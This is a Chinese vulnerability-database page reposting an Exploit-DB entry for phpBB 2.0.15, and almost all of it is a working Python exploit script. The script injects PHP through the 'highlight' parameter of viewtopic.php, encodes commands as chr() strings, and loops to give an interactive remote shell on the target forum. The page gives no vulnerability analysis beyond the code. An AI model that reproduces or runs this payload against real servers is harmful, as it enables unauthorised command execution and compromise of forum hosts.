phpBB 2.0.15 – ‘highlight’ PHP Remote Code Execution

phpBB 2.0.15 – ‘highlight’ PHP Remote Code Execution

漏洞ID 1055213 漏洞类型
发布时间 2005-06-29 更新时间 2005-06-29
图片[1]-phpBB 2.0.15 – ‘highlight’ PHP Remote Code Execution-安全小百科CVE编号 N/A
图片[2]-phpBB 2.0.15 – ‘highlight’ PHP Remote Code Execution-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/1076
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# tested and working /str0ke

#!/usr/bin/pyth0n
#
###############################################################  this exploit for
                                                              #  phpBB 2.0.15 
print "nphpBB 2.0.15 arbitrary command execution eXploit"    #  emulates a shell,
print " 2005 by [email protected]"                      #  rather than 
print " well, just because there is none."                    #  sending a single
                                                              #  command.
import sys                                                 ####
from urllib2 import Request, urlopen
from urlparse import urlparse, urlunparse
from urllib import quote as quote_plus

INITTAG = '<g0>'
ENDTAG  = '</g0>'

def makecmd(cmd):
    return reduce(lambda x,y: x+'.chr(%d)'%ord(y),cmd[1:],'chr(%d)'%ord(cmd[0]))


_ex  = "%sviewtopic.php?t=%s&highlight=%%27."
_ex += "printf(" + makecmd(INITTAG) + ").system(%s)."
_ex += "printf(" + makecmd(ENDTAG) + ").%%27"


def usage():
    print """Usage: %s <forum> <topic>
 
    forum - fully qualified url to the forum
            example: http://www.host.com/phpBB/

    topic - ID of an existing topic. Well you 
            will have to check yourself.

"""[:-1] % sys.argv[0]; sys.exit(1)


if __name__ == '__main__':

    if len(sys.argv) < 3 or not sys.argv[2].isdigit():
        usage()
    else:
        print
        url = sys.argv[1]
        if url.count("://") == 0: 
            url = "http://" + url
        url = list(urlparse(url))
        host = url[1]
        if not host: usage()

        if not url[0]: url[0] = 'http'
        if not url[2]: url[2] = '/'
        url[3] = url[4] = url[5] = ''

        url = urlunparse(url)
	if url[-1] != '/': url += '/'

        topic = quote_plus((sys.argv[2]))

        while 1:

            try:
                cmd = raw_input("[%s]$ " % host).strip()
                if cmd[-1]==';': cmd=cmd[:-1]

                if (cmd == "exit"): break
                else: cmd = makecmd(cmd)
		
		out = _ex % (url,topic,cmd)

                try: ret = urlopen(Request(out)).read()
                except KeyboardInterrupt: continue
                except: pass

                else:
                    ret = ret.split(INITTAG,1)
                    if len(ret)>1: ret = ret[1].split(ENDTAG,1)
                    if len(ret)>1:
                        ret = ret[0].strip();
                        if ret: print ret
                        continue;

                print "EXPLOIT FAILED"

            except:
                continue

# milw0rm.com [2005-06-29]

相关推荐: Mosix ClumpOS Blank Default VNC Password Vulnerability

Mosix ClumpOS Blank Default VNC Password Vulnerability 漏洞ID 1102197 漏洞类型 Configuration Error 发布时间 2002-04-23 更新时间 2002-04-23 CVE编号…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享